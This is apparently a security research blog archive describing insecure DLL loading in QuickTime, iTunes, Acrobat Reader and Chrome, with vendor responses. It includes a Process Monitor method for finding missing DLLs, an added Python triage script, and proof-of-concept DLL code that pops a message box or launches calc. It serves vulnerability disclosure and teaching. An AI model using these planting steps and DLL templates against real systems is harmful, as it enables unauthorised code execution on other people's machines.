By default the QuickTime Player installation does not come with CoreFoundation.dll, but QuickTime Player tries to load the DLL when started.
Create any malicious DLL, rename it to CoreFoundation.dll, and copy it to C:\Program Files (x86)\QuickTime\
After copying the DLL, if we start QuickTime Player, the code in the malicious DLL executes, leading to DLL injection.
Location: C:\Program Files (x86)\QuickTime\CoreFoundation.dll
Application: QuickTime 7.7.2
OS: Windows 7 Ultimate N SP1
Apple's response
After examining your report we do not see any actual security implications.
Writing a file to the C:\Program Files (x86)\QuickTime directory requires local administrative privileges.
Bit of Everything! Vulnerability Research, Reverse Engineering, Malware Analysis, Exploits etc...
Showing posts with label DLL Injection.
Saturday, February 14, 2015
Apple iTunes Insecure DLL Loading Code Execution
By default the iTunes installation does not come with dwmapi.dll, but iTunes tries to load the DLL when started.
Create any malicious DLL, rename it to dwmapi.dll, and copy it to C:\Program Files (x86)\iTunes\
After copying the DLL, if we start iTunes, the code in the malicious DLL executes, leading to DLL injection.
Location: C:\Program Files (x86)\iTunes\dwmapi.dll
Application: iTunes 12.0.1.26
OS: Windows 7 Ultimate N SP1
Apple's response
After examining your report we do not see any actual security implications.
Writing a file to the C:\Program Files (x86)\iTunes directory requires local administrative privileges.
Acrobat Reader Insecure DLL Loading Code Execution
Rename any malicious DLL to
C:\Program Files\Adobe\Reader 11.0\Reader\ntmarta.dll
which will be loaded by Adobe Acrobat Reader.
PoC code for ntmarta.dll:
    #include <windows.h>

    /* Entry point run by the loader when Acrobat Reader maps ntmarta.dll;
       the PoC only shows a message box to prove that the DLL's code ran. */
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH) {
            MessageBoxW(NULL, L"DLL Injection by Disects!", L"Developed by Praveen Darshanam",
                        MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);
        }
        return TRUE;  /* report successful initialisation to the loader */
    }
Compile the above code into a Dynamic Link Library (DLL).
Tested on
Acrobat Reader 11.0.10
Windows 7 Ultimate N SP1
Refer
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
http://blog.disects.com/2015/02/google-chrome-insecure-dll-loading-code.html
Google Chrome Insecure DLL Loading Code Execution
Google Chrome tries to load cryptbase.dll by default from
C:\Program Files\Google\Chrome\Application\ but the DLL is not part of the installation.
Chrome fails with a DLL Not Found error.
If we copy any malicious DLL renamed as cryptbase.dll to C:\Program Files\Google\Chrome\Application\
Chrome will load and execute the DLL controlled by the malicious user.
The source code which I used for building the DLL is at
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
Tested on
Chrome 39.0.2171.95m (latest is also vulnerable)
Windows 7 Ultimate N SP1
Reported to Google, but they did not consider it a vulnerability, stating that it is a local exploit.
Sunday, September 21, 2014
Finding and Exploiting DLL Injection Vulnerabilities
We need the Process Monitor tool, part of the Sysinternals suite, to find the vulnerability.
Loading of non-existent Dynamic Link Libraries (DLLs) by the process under analysis can be found using the Process Monitor filter below:
Process Name is wab.exe then Include
Path ends with .dll then Include
Result is NAME NOT FOUND then Include
The above filter and snapshot show that Login.exe couldn't find the DLLs SXS.dll, CLBCATQ.dll, etc.
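The three filter rules above, applied offline to a saved Process Monitor log, as an added example that is not part of the original post. It reads a constructed CSV export (the C:\Tools\Login\ directory assumed for Login.exe and every row are made up; the chrome.exe row reuses the Chrome path from the post above), applies the same three rules as the filter, and goes one step further than the filter by covering every process in the log and recording, for each missing DLL, the directory that was probed and whether the same name was later found somewhere else. That directory is what to check next, since the vendor responses on this page turn on whether a non-administrator can write to it.

```python
"""Triage a Process Monitor CSV export for DLL search-order hijacking candidates."""
import csv
import io
import ntpath


# Constructed sample of a Process Monitor export (File > Save..., CSV format).
# The header matches ProcMon's default columns; every row is made up for this
# example, including the C:\Tools\Login\ directory assumed for Login.exe.
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.0001","Login.exe","4120","CreateFile","C:\\Tools\\Login\\SXS.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.0002","Login.exe","4120","CreateFile","C:\\Windows\\System32\\SXS.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.0003","Login.exe","4120","CreateFile","C:\\Tools\\Login\\CLBCATQ.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.0004","Login.exe","4120","CreateFile","C:\\Tools\\Login\\settings.ini","NAME NOT FOUND","Desired Access: Generic Read"
"10:01:02.0005","Login.exe","4120","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:03.0001","chrome.exe","5210","CreateFile","C:\\Program Files\\Google\\Chrome\\Application\\cryptbase.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:03.0002","chrome.exe","5210","CreateFile","C:\\Windows\\System32\\cryptbase.dll","SUCCESS","Desired Access: Read Attributes"
"""


def _rows(csv_text):
    """Parse the export; ProcMon quotes every field, which the csv module handles as-is."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def missing_dll_loads(csv_text, process_name=None):
    """Apply the post's three Include rules to a saved log.

    Returns {process name: [paths]} of .dll probes that ended in NAME NOT FOUND,
    in first-seen order and without duplicates. With process_name=None every
    process in the log is considered (the ProcMon filter looked at one).
    """
    hits = {}
    for row in _rows(csv_text):
        proc = row["Process Name"]
        if process_name is not None and proc.lower() != process_name.lower():
            continue  # rule 1: Process Name is <name>
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue  # rule 2: Path ends with .dll
        if row["Result"] != "NAME NOT FOUND":
            continue  # rule 3: Result is NAME NOT FOUND
        seen = hits.setdefault(proc, [])
        if path.lower() not in (p.lower() for p in seen):
            seen.append(path)
    return hits


def hijack_candidates(csv_text, process_name=None):
    """Turn each missing DLL into a triage record.

    'directory' is where the loader probed (the place whose ACL decides whether a
    non-admin could plant a file there); 'found_elsewhere' says whether the same
    DLL name was later opened successfully from another directory, i.e. whether
    this was search-order fall-through or a genuinely absent dependency.
    """
    found = set()
    for row in _rows(csv_text):
        if row["Result"] == "SUCCESS" and row["Path"].lower().endswith(".dll"):
            found.add((row["Process Name"].lower(), ntpath.basename(row["Path"]).lower()))
    records = []
    for proc, paths in missing_dll_loads(csv_text, process_name).items():
        for path in paths:
            name = ntpath.basename(path)
            records.append({
                "process": proc,
                "dll": name,
                "directory": ntpath.dirname(path),
                "found_elsewhere": (proc.lower(), name.lower()) in found,
            })
    return records


if __name__ == "__main__":
    for rec in hijack_candidates(SAMPLE_CSV):
        kind = "search-order fall-through" if rec["found_elsewhere"] else "absent dependency"
        print(f'{rec["process"]}: {rec["dll"]} probed in {rec["directory"]} ({kind})')
```

Save the capture from Process Monitor with File > Save in CSV format and pass the file's contents to hijack_candidates; the non-DLL NAME NOT FOUND rows (settings.ini in the sample) drop out exactly as they do under the ProcMon filter.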
Create a DLL with the following code, rename it to any of SXS.dll, CLBCATQ.dll, etc., and copy it to the path from which we execute the vulnerable binary.
    #include <windows.h>

    /* Entry point run by the loader when the planted DLL is mapped into the
       process; the message box is the proof that our code executed. */
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH) {
            MessageBoxW(NULL, L"DLL Injection by Disects !",
                        L"developed by Praveen Darshanam",
                        MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);
        }
        return TRUE;
    }
Search for the DLL we injected.
When we execute the Login.exe binary, our DLL is loaded and the code present in the DLL executes.
To execute the calculator we can use the code below:
    #include <windows.h>
    #include <stdlib.h>

    /* Launch calc as a visible sign of code execution, then terminate the host
       process; exit() never returns, so the function needs no return value. */
    static void exec_calc(void)
    {
        WinExec("calc", 0);
        exit(0);
    }

    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH)
            exec_calc();
        return TRUE;
    }
Done!